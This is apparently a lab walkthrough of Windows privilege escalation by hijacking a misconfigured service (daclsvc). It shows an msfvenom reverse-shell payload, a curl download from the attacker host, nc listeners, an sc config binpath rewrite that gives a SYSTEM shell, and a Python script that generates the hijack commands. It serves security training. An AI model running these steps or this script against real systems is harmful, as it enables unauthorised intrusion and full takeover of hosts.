Privilege escalation via weak service permissions (daclsvc)
Simulating an already-compromised host on the internal network
Connect to the box over RDP with xfreerdp
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130
root@ip-10-10-25-36:~/Desktop# xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.195.130
connected to 10.10.195.130:3389
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: CERTIFICATE NAME MISMATCH! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
The hostname used for this connection (10.10.195.130)
does not match the name given in the certificate:
Common Name (CN):
WIN-QBA94KB3IOF
A valid certificate for the wrong name should NOT be trusted!
Certificate details:
Subject: CN = WIN-QBA94KB3IOF
Issuer: CN = WIN-QBA94KB3IOF
Thumbprint: 94:74:b9:ba:dc:f7:a2:ca:9e:d0:00:e7:4a:33:22:1a:5a:d2:a1:2c
The above X.509 certificate could not be verified, possibly because you do not have the CA certificate in your certificate store, or the certificate has expired. Please look at the documentation on how to create local certificate store for a private CA.
Do you trust the above certificate? (Y/N) Y
Generate the reverse shell payload
root@ip-10-10-25-36:~/Desktop# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.25.36 LPORT=6666 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
root@ip-10-10-25-36:~/Desktop#
Start an HTTP server on the attacker to serve the payload
python3 -m http.server 1010
On the target, download the file with curl
curl -O 10.10.25.36:1010/reverse.exe
Start an nc listener on the attacker, then run reverse.exe on the target to catch the (user-level) reverse shell
root@ip-10-10-25-36:~/Desktop# nc -lnvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 10.10.195.130 49746 received!
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54A8-AA62
Directory of C:\Users\user\Desktop
02/28/2023 06:16 AM <DIR> .
02/28/2023 06:16 AM <DIR> ..
06/05/2020 07:32 AM 959 AdminPaint.lnk
08/19/2020 10:06 AM 737 PrivEsc - Shortcut.lnk
02/28/2023 06:16 AM 7,168 reverse.exe
3 File(s) 8,864 bytes
2 Dir(s) 30,850,797,568 bytes free
C:\Users\user\Desktop>
Exploiting insecure service permissions
Every Windows service has its own DACL. If an administrator grants a low-privileged account write-type rights over a service (above all SERVICE_CHANGE_CONFIG), that account can reconfigure the service and make it run arbitrary code as the service's own account, escalating from a normal user to SYSTEM.
Use accesschk.exe to check which rights the "user" account holds, first over every service (*) and then over "daclsvc" alone. The flags: /accepteula suppresses the EULA prompt (which would hang a non-interactive shell), -u suppresses errors, -w lists only objects the account has write access to, -c treats the name as a service, -q omits the banner, and -v lists the individual rights:
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user *
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
Output
C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -uwcqv user *
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user *
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\Users\user\Desktop>
C:\Users\user\Desktop>C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
C:\Users\user\Desktop>
accesschk.exe is a Microsoft Sysinternals tool; on this box a copy is already present at C:\PrivEsc.
The output shows the current user has RW access to daclsvc, including SERVICE_CHANGE_CONFIG (rewrite the service configuration) together with SERVICE_START and SERVICE_STOP. That is the combination a hijack needs: change the binary path, then (re)start the service. Without SERVICE_START the same misconfiguration is only exploitable if the service is auto-start and the user can trigger a reboot.
Next, query the service configuration to see which account it runs as (SERVICE_START_NAME) and which executable it launches (BINARY_PATH_NAME):
sc qc daclsvc
Output
C:\Users\user\Desktop>sc qc daclsvc
sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user\Desktop>
Two fields in the configuration matter here.
SERVICE_START_NAME is LocalSystem, so the service process runs as SYSTEM.
BINARY_PATH_NAME is "C:\Program Files\DACL Service\daclservice.exe", the executable the Service Control Manager launches when the service starts. Because we hold SERVICE_CHANGE_CONFIG, we can repoint BINARY_PATH_NAME at the reverse.exe we uploaded; the next time the service starts, the SCM runs our binary as LocalSystem and the shell it sends back carries that privilege. Note the syntax: sc requires a space after binpath=, and the path is wrapped in escaped quotes inside the outer quotes so that it is stored quoted, exactly like the original entry (keep a note of the original path so it can be restored afterwards):
C:\Users\user\Desktop>sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""
sc config daclsvc binpath= "\"C:\Users\user\Desktop\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS
C:\Users\user\Desktop>
Query the service configuration again to confirm the change
C:\Users\user\Desktop>sc qc daclsvc
sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Users\user\Desktop\reverse.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user\Desktop>
Start the service
net start daclsvc
Open a second nc listener on port 6666 on the attacker (the port is hard-coded in the payload, and the first listener is occupied by the user-level shell), then start the service: a new connection arrives carrying a SYSTEM shell.
The SCM launches whatever BINARY_PATH_NAME points at under the service account, so reverse.exe runs as LocalSystem and the shell inherits that token. Because reverse.exe is not a real service binary and never reports its status back to the SCM, net start will eventually fail with a timeout error (error 1053), but by then the payload has already executed. Once done, point BINARY_PATH_NAME back at the original daclservice.exe so the service is left as it was found.
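The whole procedure above (enumerate with accesschk, read sc qc, rewrite binpath=, pick the trigger, restore) can be scripted as a triage step. What follows is an added example and not code from the original walkthrough: it parses the two outputs shown above, decides whether a service is hijackable and how, and emits the sc config command in the same cmd.exe quoting the walkthrough uses, plus the matching restore command. The daclsvc sample text is an abridged copy of the page's output; the autosvc entry, the payload path argument, the error notes and the rights sets (which rights count as "can reconfigure", "can start", "can stop") are the author's own assumptions, written from the documented meaning of the Windows service access rights.

```python
"""Weak-service-permission triage: an added example, not code from the original
walkthrough. It parses `accesschk.exe -uwcqv <user> *` and `sc qc <service>` output,
decides whether a service can be hijacked, and builds the exploit and restore
commands with the same cmd.exe quoting the walkthrough uses."""
import re

# Rights that let the caller rewrite the configuration, directly or after first
# rewriting the DACL (WRITE_DAC) or taking ownership (WRITE_OWNER).
DIRECT_CONFIG = {"SERVICE_CHANGE_CONFIG", "SERVICE_ALL_ACCESS", "GENERIC_ALL"}
CONFIG_RIGHTS = DIRECT_CONFIG | {"WRITE_DAC", "WRITE_OWNER"}
START_RIGHTS = {"SERVICE_START", "SERVICE_ALL_ACCESS", "GENERIC_ALL"}
STOP_RIGHTS = {"SERVICE_STOP", "SERVICE_ALL_ACCESS", "GENERIC_ALL"}
SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system"}

# daclsvc: abridged accesschk output from the walkthrough (indentation restored).
# autosvc: constructed entry for a service the user can reconfigure but not start.
ACCESSCHK_SAMPLE = """\
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
RW autosvc
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
"""

# Abridged `sc qc daclsvc` output from the walkthrough.
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        SERVICE_START_NAME : LocalSystem
"""

_ACCESS_LINE = re.compile(r"^(RW|R|W)\s+(\S+)\s*$")      # e.g. "RW daclsvc"
_RIGHT_LINE = re.compile(r"^\s*([A-Z][A-Z_]+)\s*$")     # one right per line
_KV_LINE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")  # "KEY : value"


def parse_accesschk(text):
    """Map each service accesschk lists to the set of rights shown under it."""
    services, current = {}, None
    for line in text.splitlines():
        if m := _ACCESS_LINE.match(line):
            current = m.group(2)
            services[current] = set()
        elif current is not None and (m := _RIGHT_LINE.match(line)):
            services[current].add(m.group(1))
    return services


def parse_sc_qc(text):
    """Pull the fields that matter for a hijack out of `sc qc` output."""
    f = {m.group(1): m.group(2) for m in map(_KV_LINE.match, text.splitlines()) if m}
    start = f.get("START_TYPE", "").split()  # "3   DEMAND_START" -> "DEMAND_START"
    return {"name": f.get("SERVICE_NAME", ""), "start_type": start[-1] if start else "",
            "binary_path": f.get("BINARY_PATH_NAME", ""),  # quotes included, as printed
            "start_name": f.get("SERVICE_START_NAME", "")}


def cmd_quote(value):
    """Quote a binpath= value for cmd.exe: whole value in double quotes, inner
    quotes escaped as \\", so a quoted path with spaces reaches sc.exe intact."""
    return '"' + value.replace('"', '\\"') + '"'


def assess(rights, cfg, payload):
    """Describe whether and how the service can be hijacked to run `payload`."""
    name = cfg["name"]
    r = {"service": name, "exploitable": False, "trigger": None, "note": "",
         "runs_as_system": cfg["start_name"].lower() in SYSTEM_ACCOUNTS,
         "commands": [], "restore": []}
    if not rights & CONFIG_RIGHTS:
        r["note"] = "no right that allows changing the service configuration"
        return r
    if not rights & DIRECT_CONFIG:
        r["note"] = "WRITE_DAC/WRITE_OWNER only: grant SERVICE_CHANGE_CONFIG via sc sdset first"
    if rights & START_RIGHTS:
        r["trigger"] = f"net start {name}"
    elif cfg["start_type"] == "AUTO_START":
        r["trigger"] = "reboot (auto-start service, no SERVICE_START right)"
    else:
        r["note"] = "configuration is writable but nothing lets us (re)start the service"
        return r
    r["exploitable"] = True
    if rights & STOP_RIGHTS:  # a service that is already running must be stopped first
        r["commands"].append(f"net stop {name}")
    new_path = '"' + payload + '"'  # store it quoted, like the original BINARY_PATH_NAME
    r["commands"].append(f"sc config {name} binpath= {cmd_quote(new_path)}")
    if rights & START_RIGHTS:
        r["commands"].append(r["trigger"])
    if cfg["binary_path"]:  # keep the original path so the service can be put back afterwards
        r["restore"].append(f"sc config {name} binpath= {cmd_quote(cfg['binary_path'])}")
    return r
```

Calling assess(parse_accesschk(ACCESSCHK_SAMPLE)["daclsvc"], parse_sc_qc(SC_QC_SAMPLE), r"C:\Users\user\Desktop\reverse.exe") reproduces the walkthrough: exploitable, runs as SYSTEM, trigger net start daclsvc, the exact sc config line typed above, and a restore line that puts "C:\Program Files\DACL Service\daclservice.exe" back. The constructed autosvc only becomes exploitable across a reboot because the user cannot start it, a service where the user holds only WRITE_DAC gets a note that sc sdset is needed first, and a service with only query rights is reported as not exploitable.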